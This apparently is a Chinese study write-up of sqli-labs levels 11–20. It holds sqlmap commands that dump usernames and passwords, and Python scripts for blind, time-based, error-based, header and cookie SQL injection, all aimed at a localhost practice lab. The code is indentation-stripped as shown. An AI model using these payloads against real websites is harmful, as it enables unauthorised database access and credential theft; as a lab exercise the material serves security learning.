sqli-labs(11~20)脚本、sqlmap学习
sqlmap知识补充
-r 表示加载一个文件
-p 指定参数
less-11(普普通通的post)
上传post文件,得到参数
sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt"
根据参数,得到当前数据库
sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt" -p uname --dbs
获取用户名和密码
sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt" -p uname -T "users" -C "username","password" --dump
脚本:查询当前数据库名称(采用盲注形式)
import requests #比urllib.parse方便
name=""
url="http://127.0.0.1/sqli/Less-11/"
d = list('abcdefghijklmnopqrstuvwxyz0123456789@_.{}?!')
#注入字段
inn="1' or 1=1 and mid((database()),%s,1)='%s'#"
for i in range(1,30):
for j in d:
#字典格式
data={'uname':inn %(i,j),'passwd':'','submit':'Submit'}
#发送post请求
response = requests.post(url,data = data)
#获取报文
t=response.text
if t.find('Login') >0:
name+=j
print(j)
print(name)
结果
less-12
uname=n") or 1=1 #,其他和11一样
less-13(时间盲注)
获取id和用户名
sqlmap.py -r "C:\Users\丷木丷\Desktop\less-13.txt" -D "security" -T "users" -C "id","username" --dump
脚本:获取id=3的用户名,参考时间盲注
import requests
import time
name=""
url="http://127.0.0.1/sqli/Less-13/"
d = list('abcdefghijklmnopqrstuvwxyz')
#注入字段
inn="n') or if(mid((select username from security.users where id=3),%s,1)='%s',sleep(1),0)#"
for i in range(1,10):
for j in d:
#字典格式
time1=time.time()
data={'uname':inn %(i,j),'passwd':'','submit':'Submit'}
#print(data)
#发送post请求
response = requests.post(url,data = data)
#t=response.text
#获取报文
time2=time.time()
if time2-time1 >1:
name+=j
print(j)
print(name)
结果
less-14
和13一样的时间盲注,但注意转义成 \"
脚本:获取库
import requests
import time
name=""
url="http://127.0.0.1/sqli/Less-14/"
d = list('abcdefghijklmnopqrstuvwxyz')
#注入字段
#这里的引号有冲突,改为\"
inn="n\" or if(mid((database()),%s,1)='%s',sleep(1),0)#"
for i in range(1,10):
for j in d:
#字典格式
time1=time.time()
data={'uname':inn %(i,j),'passwd':'','submit':'Submit'}
#print(data)
#发送post请求
response = requests.post(url,data = data)
#t=response.text
#获取报文
time2=time.time()
if time2-time1 >1:
name+=j
print(j)
print(name)
结果
less-15(密码注入点)
和前面一样,注入点改为密码
脚本:获取库
import requests
import time
name=""
url="http://127.0.0.1/sqli/Less-15/"
d = list('abcdefghijklmnopqrstuvwxyz')
#注入字段
inn="n' or if(mid((database()),%s,1)='%s',sleep(1),0)#"
for i in range(1,10):
for j in d:
#字典格式
time1=time.time()
#注入点在密码
data={'uname':'','passwd':inn %(i,j),'submit':'Submit'}
#print(data)
#发送post请求
response = requests.post(url,data = data)
#t=response.text
#获取报文
time2=time.time()
if time2-time1 >1:
name+=j
print(j)
print(name)
结果
less-16
uname=addmin&passwd=ad" or 1=1 #,注意\",其他和15一样
less-17(updatexml报错注入)
注意\'转义
脚本:查询数据库
import requests
name=""
url="http://127.0.0.1/sqli/Less-17/"
d = list('abcdefghijklmnopqrstuvwxyz')
data={'uname':'admin','passwd':'dadad\' and updatexml(1,concat(0x7e,(database())),1)#','submit':'Submit'}
r = requests.post(url,data = data)
t=r.text
print(t)
结果:在报错信息中可见库
less-18(user-agent注入)
脚本:post请求修改请求头的user-agent (bibi赖赖:转义改的心态崩了= =)
import requests
name=""
url="http://127.0.0.1/sqli/Less-18/"
#\转义 \转义 \转义 \转义 \转义 \转义 \转义
'''
{'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)Gecko/20100101 Firefox/89.0
\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
'''
u={'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
data={'uname':'admin','passwd':'admin','submit':'Submit'}
r = requests.post(url,data,headers=u)
t=r.text
print(t)
结果
less-19(referer注入)
脚本:跟18一样,改成referer就行,同样需要转义
import requests
name=""
url="http://127.0.0.1/sqli/Less-19/"
'''
Referer: http://127.0.0.1/sqli/Less-19/
{'Referer':'http://127.0.0.1/sqli/Less-19/
\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
'''
u={'Referer':'http://127.0.0.1/sqli/Less-19/\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
data={'uname':'admin','passwd':'admin','submit':'Submit'}
r = requests.post(url,data,headers=u)
t=r.text
print(t)
结果
less-20(cookie注入)
cookie中value值' #注入
脚本
import requests
name=""
url="http://127.0.0.1/sqli/Less-20/"
u={'Cookie':'uname=1\' union select 1,2,group_concat(concat_ws(\'-\',id,username,password)) from users#'}
data={'uname':'admin','passwd':'admin','submit':'Submit'}
r = requests.post(url,data,headers=u)
t=r.text
print(t)
结果:整不出来,应该是版本问题,暂时未解决
